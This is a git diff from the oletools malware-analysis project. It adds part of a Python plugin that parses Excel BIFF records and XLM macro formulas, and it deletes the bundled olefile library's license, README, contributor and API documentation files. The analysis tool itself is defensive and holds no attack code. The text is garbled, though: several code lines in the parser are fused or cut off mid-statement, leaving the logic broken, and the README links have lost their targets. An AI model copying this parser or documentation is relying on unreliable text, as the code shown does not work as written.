+0x8222: 'HIDEALL.NOTES',
+0x8223: 'DELETE.NOTE',
+0x8224: 'TRAVERSE.NOTES',
+0x8225: 'ACTIVATE.NOTES',
+0x826C: 'PROTECT.REVISIONS',
+0x826D: 'UNPROTECT.REVISIONS',
+0x8287: 'OPTIONS.ME',
+0x828D: 'WEB.PUBLISH',
+0x829B: 'NEWWEBQUERY',
+0x82A1: 'PIVOT.TABLE.CHART',
+0x82F1: 'OPTIONS.SAVE',
+0x82F3: 'OPTIONS.SPELL',
+0x8328: 'HIDEALL.INKANNOTS',
+ }
+
+ def GetFunctionName(functionid):
+ if functionid in dFunctions:
+ name = dFunctions[functionid]
+ if isinstance(name, list):
+ return name[0]
+ else:
+ name = '*UNKNOWN FUNCTION*'
+ return name
+
+ def GetFunctionArity(functionid):
+ arity = 1
+ if functionid in dFunctions:
+ entry = dFunctions[functionid]
+ if isinstance(entry, list):
+ arity = entry[1]
+ return arity
+
+ result = ''
+ stack = []
+ while len(expression) > 0:
+ ptgid = P23Ord(expression[0])
+ expression = expression[1:]
+ if ptgid in dTokens:
+ result += dTokens[ptgid] + ' '
+ if ptgid == 0x03: # ptgAdd https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/27db2f45-11e8-4238-94ed-92fd9c5721fb
+ StackBinary(stack, '+')
+ elif ptgid == 0x4: # ptgSub
+ StackBinary(stack, '-')
+ elif ptgid == 0x5: # ptgMul
+ StackBinary(stack, '*')
+ elif ptgid == 0x6: # ptgDiv
+ StackBinary(stack, '/')
+ elif ptgid == 0x8: # ptgConcat
+ StackBinary(stack, '&')
+ elif ptgid == 0x09: # ptgLt https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/28de4981-1352-4a5e-a3b7-f15a8a6ce7fb
+ StackBinary(stack, '<')
+ elif ptgid == 0x0A: # ptgLE
+ StackBinary(stack, '<=')
+ elif ptgid == 0x0B: # ptgEQ
+ StackBinary(stack, '=')
+ elif ptgid == 0x0C: # ptgGE
+ StackBinary(stack, '>=')
+ elif ptgid == 0x0D: # ptgGT
+ StackBinary(stack, '>')
+ elif ptgid == 0x0E: # ptgNE
+ StackBinary(stack, '<>')
+ elif ptgid == 0x15: # ptgParen
+ operand1 = stack.pop()
+ stack.append('(' + operand1 + ')')
+ elif ptgid == 0x17: # ptgStr https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/87c2a057-705c-4473-a168-6d5fac4a9eba
+ length = P23Ord(expression[0])
+ expression = expression[1:]
+ if P23Ord(expression[0]) == 0: # probably BIFF8 -> UNICODE (compressed)
+ expression = expression[1:]
+ stringValue = P23Decode(expression[:length])
+ result += '"%s" ' % stringValue
+ expression = expression[length:]
+ elif P23Ord(expression[0]) == 1: # if 1, then double byte chars
+ # doublebyte check: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/05162858-0ca9-44cb-bb07-a720928f63f8
+ expression = expression[1:]
+ stringValue = P23Decode(expression[:length*2])
+ result += '"%s" ' % stringValue
+ expression = expression[length*2:]
+ stack.append('"' + stringValue + '"')
+ elif ptgid == 0x19:
+ grbit = P23Ord(expression[0])
+ expression = expression[1:]
+ if grbit & 0x04:
+ result += 'CHOOSE '
+ break
+ else:
+ expression = expression[2:]
+ elif ptgid == 0x16: #ptgMissArg
+ stack.append('')
+ elif ptgid == 0x1d: # ptgBool https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/d59e28db-4d6f-4c86-bcc9-c8a783e352ec
+ boolValue = IFF(P23Ord(expression[0]), 'TRUE', 'FALSE')
+ result += '%s ' % (boolValue)
+ expression = expression[1:]
+ stack.append(boolValue)
+ elif ptgid == 0x1e: #ptgInt
+ value = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ result += '%d ' % (value)
+ expression = expression[2:]
+ stack.append(str(value))
+ elif ptgid == 0x41: #ptgFuncV
+ functionid = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ result += '%s (0x%04x) ' % (GetFunctionName(functionid), functionid)
+ expression = expression[2:]
+ StackFunction(stack, GetFunctionName(functionid), GetFunctionArity(functionid))
+ elif ptgid == 0x22 or ptgid == 0x42 or ptgid == 0x62:
+ functionid = P23Ord(expression[1]) + P23Ord(expression[2]) * 0x100
+ numberOfArguments = P23Ord(expression[0])
+ result += 'args %d func %s (0x%04x) ' % (numberOfArguments, GetFunctionName(functionid), functionid)
+ expression = expression[3:]
+ if functionid == 0x806D:
+ expression = expression[9:]
+ StackFunction(stack, GetFunctionName(functionid), numberOfArguments)
+ elif ptgid == 0x23: # ptgName https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/5f05c166-dfe3-4bbf-85aa-31c09c0258c0
+ nameValue = struct.unpack('> 2) / divider
+ else:
+ return struct.unpack('= 21:
+ cellref, dummy = ParseLoc(data, options.cellrefformat, True)
+ formatcodes = 'H'
+ formatsize = struct.calcsize(formatcodes)
+ length = struct.unpack(formatcodes, data[20:20 + formatsize])[0]
+ expression = data[22:]
+ parsedExpression, stack = ParseExpression(expression, definesNames, sheetNames, options.cellrefformat)
+ line += ' - %s len=%d %s' % (cellref, length, parsedExpression)
+ if len(stack) == 1:
+ csvrow = [currentSheetname, cellref, stack[0], '']
+ else:
+ csvrow = [currentSheetname, cellref, repr(stack), '']
+ if options.formulabytes:
+ data_hex = P23Decode(binascii.b2a_hex(data))
+ spaced_data_hex = ' '.join(a+b for a,b in zip(data_hex[::2], data_hex[1::2]))
+ line += '\nFORMULA BYTES: %s' % spaced_data_hex
+
+ # LABEL record #a# difference BIFF4 and BIFF5+
+ if opcode == 0x18 and len(data) >= 16:
+ flags = P23Ord(data[0])
+ lnName = P23Ord(data[3])
+ szFormula = P23Ord(data[4]) + P23Ord(data[5]) * 0x100
+ offset = 14
+ if P23Ord(data[offset]) == 0: #a# hack with BIFF8 Unicode
+ offset = 15
+ if flags & 0x20:
+ dBuildInNames = {1: 'Auto_Open', 2: 'Auto_Close'}
+ code = P23Ord(data[offset])
+ name = dBuildInNames.get(code, '?')
+ line += ' - built-in-name %d %s' % (code, name)
+ else:
+ name = P23Decode(data[offset:offset+lnName])
+ line += ' - %s' % (name)
+ definesNames.append(name)
+ if flags & 0x01:
+ line += ' hidden'
+ parsedExpression, stack = ParseExpression(data[offset+lnName:offset+lnName+szFormula], definesNames, sheetNames, options.cellrefformat)
+ line += ' len=%d %s' % (szFormula, parsedExpression)
+
+ # FILEPASS record
+ if opcode == 0x2f:
+ filepassFound = True
+
+ # BOUNDSHEET record
+ if opcode == 0x85 and len(data) >= 6:
+ formatcodes = '= 4:
+ formatcodes = 'H'
+ formatsize = struct.calcsize(formatcodes)
+ dt = struct.unpack(formatcodes, data[2:2 + formatsize])[0]
+ dStreamType = {5: 'workbook', 0x10: 'dialog sheet/worksheet', 0x20: 'chart sheet', 0x40: 'macro sheet'}
+ line += ' - %s' % (dStreamType.get(dt, '0x%04x' % dt))
+ if positionBIFFRecord in dSheetNames:
+ line += ' - %s' % (dSheetNames[positionBIFFRecord])
+ currentSheetname = dSheetNames[positionBIFFRecord]
+
+ # STRING record
+ if opcode == 0x207 and len(data) >= 4:
+ values = list(Strings(data[3:]).values())
+ strings = ''
+ if values[0] != []:
+ strings = values[0][0].encode()
+ if values[1] != []:
+ if strings != '':
+ strings += ' '
+ print(values)
+ strings += ' '.join(values[1])
+ line += ' - %s' % strings
+
+ # number record
+ if opcode == 0x0203:
+ cellref, data2 = ParseLoc(data, options.cellrefformat, True)
+ formatcodes = ' 0:
+ result.append(' ' + dEncodings[encoding] + ':')
+ result.extend(' ' + foundstring for foundstring in strings)
+ elif options.hex:
+ result.append(binascii.b2a_hex(data))
+ elif options.dump:
+ result = data
+
+ if options.xlm and filepassFound:
+ result = ['FILEPASS record: file is password protected']
+ elif options.xlm and not macros4Found:
+ result = []
+ elif options.csv:
+ result = [MakeCSVLine(row, DEFAULT_SEPARATOR, QUOTE) for row in [['Sheet', 'Reference', 'Formula', 'Value']] + result]
+ elif options.json:
+ result = json.dumps(result)
+
+ return result
+
+AddPlugin(cBIFF)
diff --git a/oletools/thirdparty/olefile/CONTRIBUTORS.txt b/oletools/thirdparty/olefile/CONTRIBUTORS.txt
deleted file mode 100644
index 32db267c..00000000
--- a/oletools/thirdparty/olefile/CONTRIBUTORS.txt
+++ /dev/null
@@ -1,17 +0,0 @@
-CONTRIBUTORS for the olefile project
-====================================
-
-This is a non-exhaustive list of all the people who helped me improve the
-olefile project (formerly OleFileIO_PL), in approximative chronological order.
-Please contact me if I forgot to mention your name.
-
-A big thank you to all of them:
-
-- Niko Ehrenfeuchter: added support for Jython
-- Niko Ehrenfeuchter, Martijn Berger and Dave Jones: helped fix 4K sector support
-- Martin Panter: conversion to Python 3.x/2.6+
-- mete0r_kr: added support for file-like objects
-- chuckleberryfinn: fixed bug in getproperties
-- Martijn, Ben G.: bug report for 64 bits platforms
-- Philippe Lagadec: main author and maintainer since 2005
-- and of course Fredrik Lundh: original author of OleFileIO from 1995 to 2005
diff --git a/oletools/thirdparty/olefile/LICENSE.txt b/oletools/thirdparty/olefile/LICENSE.txt
deleted file mode 100644
index 506a3d78..00000000
--- a/oletools/thirdparty/olefile/LICENSE.txt
+++ /dev/null
@@ -1,56 +0,0 @@
-LICENSE for the olefile package:
-
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2016 Philippe Lagadec
-(http://www.decalage.info)
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification,
-are permitted provided that the following conditions are met:
-
- * Redistributions of source code must retain the above copyright notice, this
- list of conditions and the following disclaimer.
- * Redistributions in binary form must reproduce the above copyright notice,
- this list of conditions and the following disclaimer in the documentation
- and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
-ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
-WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-
-----------
-
-olefile is based on source code from the OleFileIO module of the Python
-Imaging Library (PIL) published by Fredrik Lundh under the following license:
-
-The Python Imaging Library (PIL) is
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated
-documentation, you agree that you have read, understood, and will comply with
-the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its
-associated documentation for any purpose and without fee is hereby granted,
-provided that the above copyright notice appears in all copies, and that both
-that copyright notice and this permission notice appear in supporting
-documentation, and that the name of Secret Labs AB or the author not be used
-in advertising or publicity pertaining to distribution of the software without
-specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
-SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN
-NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL,
-INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
-LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
-OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
-PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/README.html b/oletools/thirdparty/olefile/README.html
deleted file mode 100644
index 74d95acc..00000000
--- a/oletools/thirdparty/olefile/README.html
+++ /dev/null
@@ -1,81 +0,0 @@
-olefile (formerly OleFileIO_PL)
-olefile is a Python package to parse, read and write Microsoft OLE2 files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), such as Microsoft Office 97-2003 documents, vbaProject.bin in MS Office 2007+ files, Image Composer and FlashPix files, Outlook messages, StickyNotes, several Microscopy file formats, McAfee antivirus quarantine files, etc.
-Quick links: Home page - Download/Install - Documentation - Report Issues/Suggestions/Questions - Contact the author - Repository - Updates on Twitter
-News
-Follow all updates and news on Twitter: https://twitter.com/decalage2
-
-- 2016-02-02 v0.43: fixed issues #26 and #27, better handling of malformed files, use python logging.
-- 2015-01-25 v0.42: improved handling of special characters in stream/storage names on Python 2.x (using UTF-8 instead of Latin-1), fixed bug in listdir with empty storages.
-- 2014-11-25 v0.41: OleFileIO.open and isOleFile now support OLE files stored in byte strings, fixed installer for python 3, added support for Jython (Niko Ehrenfeuchter)
-- 2014-10-01 v0.40: renamed OleFileIO_PL to olefile, added initial write support for streams >4K, updated doc and license, improved the setup script.
-- 2014-07-27 v0.31: fixed support for large files with 4K sectors, thanks to Niko Ehrenfeuchter, Martijn Berger and Dave Jones. Added test scripts from Pillow (by hugovk). Fixed setup for Python 3 (Martin Panter)
-- 2014-02-04 v0.30: now compatible with Python 3.x, thanks to Martin Panter who did most of the hard work.
-- 2013-07-24 v0.26: added methods to parse stream/storage timestamps, improved listdir to include storages, fixed parsing of direntry timestamps
-- 2013-05-27 v0.25: improved metadata extraction, properties parsing and exception handling, fixed issue #12
-- 2013-05-07 v0.24: new features to extract metadata (get_metadata method and OleMetadata class), improved getproperties to convert timestamps to Python datetime
-- 2012-10-09: published python-oletools, a package of analysis tools based on OleFileIO_PL
-- 2012-09-11 v0.23: added support for file-like objects, fixed issue #8
-- 2012-02-17 v0.22: fixed issues #7 (bug in getproperties) and #2 (added close method)
-- 2011-10-20: code hosted on bitbucket to ease contributions and bug tracking
-- 2010-01-24 v0.21: fixed support for big-endian CPUs, such as PowerPC Macs.
-- 2009-12-11 v0.20: small bugfix in OleFileIO.open when filename is not plain str.
-- 2009-12-10 v0.19: fixed support for 64 bits platforms (thanks to Ben G. and Martijn for reporting the bug)
-- see changelog in source code for more info.
-
-Download/Install
-If you have pip or setuptools installed (pip is included in Python 2.7.9+), you may simply run pip install olefile or easy_install olefile for the first installation.
-To update olefile, run pip install -U olefile.
-Otherwise, see https://bitbucket.org/decalage/olefileio_pl/wiki/Install
-Features
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003 legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt, Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent package or with PIL/Pillow.
-olefile is mostly meant for developers. If you are looking for tools to analyze OLE files or to extract data (especially for security purposes such as malware analysis and forensics), then please also check my python-oletools, which are built upon olefile and provide a higher-level interface.
-History
-olefile is based on the OleFileIO module from PIL, the excellent Python Imaging Library, created and maintained by Fredrik Lundh. The olefile API is still compatible with PIL, but since 2005 I have improved the internal implementation significantly, with new features, bugfixes and a more robust design. From 2005 to 2014 the project was called OleFileIO_PL, and in 2014 I changed its name to olefile to celebrate its 9 years and its new write features.
-As far as I know, olefile is the most complete and robust Python implementation to read MS OLE2 files, portable on several operating systems. (please tell me if you know other similar Python modules)
-Since 2014 olefile/OleFileIO_PL has been integrated into Pillow, the friendly fork of PIL. olefile will continue to be improved as a separate project, and new versions will be merged into Pillow regularly.
-Main improvements over the original version of OleFileIO in PIL:
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-Documentation
-Please see the online documentation for more information, especially the OLE overview and the API page which describe how to use olefile in Python applications. A copy of the same documentation is also provided in the doc subfolder of the olefile package.
-Real-life examples
-A real-life example: using OleFileIO_PL for malware analysis and forensics.
-See also this paper about python tools for forensics, which features olefile.
-License
-olefile (formerly OleFileIO_PL) is copyright (c) 2005-2016 Philippe Lagadec (http://www.decalage.info)
-All rights reserved.
-Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
-
-- Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-olefile is based on source code from the OleFileIO module of the Python Imaging Library (PIL) published by Fredrik Lundh under the following license:
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated documentation, you agree that you have read, understood, and will comply with the following terms and conditions:
-Permission to use, copy, modify, and distribute this software and its associated documentation for any purpose and without fee is hereby granted, provided that the above copyright notice appears in all copies, and that both that copyright notice and this permission notice appear in supporting documentation, and that the name of Secret Labs AB or the author not be used in advertising or publicity pertaining to distribution of the software without specific, written prior permission.
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/README.rst b/oletools/thirdparty/olefile/README.rst
deleted file mode 100644
index 04d77750..00000000
--- a/oletools/thirdparty/olefile/README.rst
+++ /dev/null
@@ -1,226 +0,0 @@
-olefile (formerly OleFileIO\_PL)
-================================
-
-`olefile `__ is a Python package to
-parse, read and write `Microsoft OLE2
-files `__
-(also called Structured Storage, Compound File Binary Format or Compound
-Document File Format), such as Microsoft Office 97-2003 documents,
-vbaProject.bin in MS Office 2007+ files, Image Composer and FlashPix
-files, Outlook messages, StickyNotes, several Microscopy file formats,
-McAfee antivirus quarantine files, etc.
-
-**Quick links:** `Home page `__ -
-`Download/Install `__
-- `Documentation `__ -
-`Report
-Issues/Suggestions/Questions `__
-- `Contact the author `__ -
-`Repository `__ - `Updates
-on Twitter `__
-
-News
-----
-
-Follow all updates and news on Twitter: https://twitter.com/decalage2
-
-- **2016-02-02 v0.43**: fixed issues
- `#26 `__
- and
- `#27 `__,
- better handling of malformed files, use python logging.
-- 2015-01-25 v0.42: improved handling of special characters in
- stream/storage names on Python 2.x (using UTF-8 instead of Latin-1),
- fixed bug in listdir with empty storages.
-- 2014-11-25 v0.41: OleFileIO.open and isOleFile now support OLE files
- stored in byte strings, fixed installer for python 3, added support
- for Jython (Niko Ehrenfeuchter)
-- 2014-10-01 v0.40: renamed OleFileIO\_PL to olefile, added initial
- write support for streams >4K, updated doc and license, improved the
- setup script.
-- 2014-07-27 v0.31: fixed support for large files with 4K sectors,
- thanks to Niko Ehrenfeuchter, Martijn Berger and Dave Jones. Added
- test scripts from Pillow (by hugovk). Fixed setup for Python 3
- (Martin Panter)
-- 2014-02-04 v0.30: now compatible with Python 3.x, thanks to Martin
- Panter who did most of the hard work.
-- 2013-07-24 v0.26: added methods to parse stream/storage timestamps,
- improved listdir to include storages, fixed parsing of direntry
- timestamps
-- 2013-05-27 v0.25: improved metadata extraction, properties parsing
- and exception handling, fixed `issue
- #12 `__
-- 2013-05-07 v0.24: new features to extract metadata (get\_metadata
- method and OleMetadata class), improved getproperties to convert
- timestamps to Python datetime
-- 2012-10-09: published
- `python-oletools `__, a
- package of analysis tools based on OleFileIO\_PL
-- 2012-09-11 v0.23: added support for file-like objects, fixed `issue
- #8 `__
-- 2012-02-17 v0.22: fixed issues #7 (bug in getproperties) and #2
- (added close method)
-- 2011-10-20: code hosted on bitbucket to ease contributions and bug
- tracking
-- 2010-01-24 v0.21: fixed support for big-endian CPUs, such as PowerPC
- Macs.
-- 2009-12-11 v0.20: small bugfix in OleFileIO.open when filename is not
- plain str.
-- 2009-12-10 v0.19: fixed support for 64 bits platforms (thanks to Ben
- G. and Martijn for reporting the bug)
-- see changelog in source code for more info.
-
-Download/Install
-----------------
-
-If you have pip or setuptools installed (pip is included in Python
-2.7.9+), you may simply run **pip install olefile** or **easy\_install
-olefile** for the first installation.
-
-To update olefile, run **pip install -U olefile**.
-
-Otherwise, see https://bitbucket.org/decalage/olefileio\_pl/wiki/Install
-
-Features
---------
-
-- Parse, read and write any OLE file such as Microsoft Office 97-2003
- legacy document formats (Word .doc, Excel .xls, PowerPoint .ppt,
- Visio .vsd, Project .mpp), Image Composer and FlashPix files, Outlook
- messages, StickyNotes, Zeiss AxioVision ZVI files, Olympus FluoView
- OIB files, etc
-- List all the streams and storages contained in an OLE file
-- Open streams as files
-- Parse and read property streams, containing metadata of the file
-- Portable, pure Python module, no dependency
-
-olefile can be used as an independent package or with PIL/Pillow.
-
-olefile is mostly meant for developers. If you are looking for tools to
-analyze OLE files or to extract data (especially for security purposes
-such as malware analysis and forensics), then please also check my
-`python-oletools `__, which
-are built upon olefile and provide a higher-level interface.
-
-History
--------
-
-olefile is based on the OleFileIO module from
-`PIL `__, the
-excellent Python Imaging Library, created and maintained by Fredrik
-Lundh. The olefile API is still compatible with PIL, but since 2005 I
-have improved the internal implementation significantly, with new
-features, bugfixes and a more robust design. From 2005 to 2014 the
-project was called OleFileIO\_PL, and in 2014 I changed its name to
-olefile to celebrate its 9 years and its new write features.
-
-As far as I know, olefile is the most complete and robust Python
-implementation to read MS OLE2 files, portable on several operating
-systems. (please tell me if you know other similar Python modules)
-
-Since 2014 olefile/OleFileIO\_PL has been integrated into
-`Pillow `__, the friendly fork of PIL.
-olefile will continue to be improved as a separate project, and new
-versions will be merged into Pillow regularly.
-
-Main improvements over the original version of OleFileIO in PIL:
-----------------------------------------------------------------
-
-- Compatible with Python 3.x and 2.6+
-- Many bug fixes
-- Support for files larger than 6.8MB
-- Support for 64 bits platforms and big-endian CPUs
-- Robust: many checks to detect malformed files
-- Runtime option to choose if malformed files should be parsed or raise
- exceptions
-- Improved API
-- Metadata extraction, stream/storage timestamps (e.g. for document
- forensics)
-- Can open file-like objects
-- Added setup.py and install.bat to ease installation
-- More convenient slash-based syntax for stream paths
-- Write features
-
-Documentation
--------------
-
-Please see the `online
-documentation `__ for
-more information, especially the `OLE
-overview `__
-and the `API
-page `__ which
-describe how to use olefile in Python applications. A copy of the same
-documentation is also provided in the doc subfolder of the olefile
-package.
-
-Real-life examples
-------------------
-
-A real-life example: `using OleFileIO\_PL for malware analysis and
-forensics `__.
-
-See also `this
-paper `__
-about python tools for forensics, which features olefile.
-
-License
--------
-
-olefile (formerly OleFileIO\_PL) is copyright (c) 2005-2016 Philippe
-Lagadec (http://www.decalage.info)
-
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-- Redistributions of source code must retain the above copyright
- notice, this list of conditions and the following disclaimer.
-- Redistributions in binary form must reproduce the above copyright
- notice, this list of conditions and the following disclaimer in the
- documentation and/or other materials provided with the distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
-IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
-TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
-PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
-TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
-PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
-LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
-NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
-SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
---------------
-
-olefile is based on source code from the OleFileIO module of the Python
-Imaging Library (PIL) published by Fredrik Lundh under the following
-license:
-
-The Python Imaging Library (PIL) is
-
-- Copyright (c) 1997-2005 by Secret Labs AB
-- Copyright (c) 1995-2005 by Fredrik Lundh
-
-By obtaining, using, and/or copying this software and/or its associated
-documentation, you agree that you have read, understood, and will comply
-with the following terms and conditions:
-
-Permission to use, copy, modify, and distribute this software and its
-associated documentation for any purpose and without fee is hereby
-granted, provided that the above copyright notice appears in all copies,
-and that both that copyright notice and this permission notice appear in
-supporting documentation, and that the name of Secret Labs AB or the
-author not be used in advertising or publicity pertaining to
-distribution of the software without specific, written prior permission.
-
-SECRET LABS AB AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH REGARD TO
-THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS. IN NO EVENT SHALL SECRET LABS AB OR THE AUTHOR BE LIABLE FOR
-ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER
-RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF
-CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
-CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
diff --git a/oletools/thirdparty/olefile/__init__.py b/oletools/thirdparty/olefile/__init__.py
deleted file mode 100644
index 59b442df..00000000
--- a/oletools/thirdparty/olefile/__init__.py
+++ /dev/null
@@ -1,28 +0,0 @@
-#!/usr/local/bin/python
-# -*- coding: latin-1 -*-
-"""
-olefile (formerly OleFileIO_PL)
-
-Module to read/write Microsoft OLE2 files (also called Structured Storage or
-Microsoft Compound Document File Format), such as Microsoft Office 97-2003
-documents, Image Composer and FlashPix files, Outlook messages, ...
-This version is compatible with Python 2.6+ and 3.x
-
-Project website: http://www.decalage.info/olefile
-
-olefile is copyright (c) 2005-2015 Philippe Lagadec (http://www.decalage.info)
-
-olefile is based on the OleFileIO module from the PIL library v1.1.6
-See: http://www.pythonware.com/products/pil/index.htm
-
-The Python Imaging Library (PIL) is
- Copyright (c) 1997-2005 by Secret Labs AB
- Copyright (c) 1995-2005 by Fredrik Lundh
-
-See source code and LICENSE.txt for information on usage and redistribution.
-"""
-
-# first try to import olefile for Python 2.6+/3.x
-from .olefile import *
-# import metadata not covered by *:
-from .olefile import __version__, __author__, __date__
diff --git a/oletools/thirdparty/olefile/doc/API.html b/oletools/thirdparty/olefile/doc/API.html
deleted file mode 100644
index 633755eb..00000000
--- a/oletools/thirdparty/olefile/doc/API.html
+++ /dev/null
@@ -1,164 +0,0 @@
-
-
-
-
-
-
-
-
-
-How to use olefile - API
-This page is part of the documentation for olefile. It explains how to use all its features to parse and write OLE files. For more information about OLE files, see OLE_Overview.
-olefile can be used as an independent module or with PIL/Pillow. The main functions and methods are explained below.
-For more information, see also the file olefile.html, sample code at the end of the module itself, and docstrings within the code.
-Import olefile
-When the olefile package has been installed, it can be imported in Python applications with this statement:
-import olefile
-Before v0.40, olefile was named OleFileIO_PL. To maintain backward compatibility with older applications and samples, a simple script is also installed so that the following statement imports olefile as OleFileIO_PL:
-import OleFileIO_PL
-As of version 0.30, the code has been changed to be compatible with Python 3.x. As a consequence, compatibility with Python 2.5 or older is not provided anymore. However, a copy of OleFileIO_PL v0.26 (with some backported enhancements) is available as olefile2.py. When importing the olefile package, it falls back automatically to olefile2 if running on Python 2.5 or older. This is implemented in olefile/init.py. (new in v0.40)
